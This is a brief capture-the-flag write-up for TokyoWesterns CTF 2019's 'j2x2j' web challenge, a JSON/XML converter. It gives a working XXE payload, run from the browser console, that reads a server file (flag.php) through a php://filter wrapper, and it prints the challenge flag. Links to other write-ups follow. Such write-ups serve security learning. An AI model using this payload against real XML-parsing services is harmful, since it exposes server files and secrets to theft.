TokyoWesterns CTF 5th 2019: Web - j2x2j

Reading time ~1 minute

This was a simple JSON-to-XML / XML-to-JSON converter. The challenge was categorized as “warmup”, so to my not-that-big surprise the most basic XXE vulnerability worked as expected:

I used the following code (written into Chrome’s console) to leak the flag:

$.post('/', { xml: `<?xml version="1.0"?><!DOCTYPE foo [<!ELEMENT leak ANY><!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///var/www/html/flag.php">]><root><leak>&xxe;</leak></root>` }, function(data) { $('#json').val(atob(JSON.parse(data).leak)); });

The flag was:

TWCTF{t1ny_XXE_st1ll_ex1sts_everywhere}

HITCON CTF 2019 Quals: Reverse - EmojiVM

This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading

HITCON CTF 2019 Quals: Reverse - CoreDumb

Published on October 19, 2019

HITCON CTF 2019 Quals: Pwn - Crypto in the shell

Published on October 19, 2019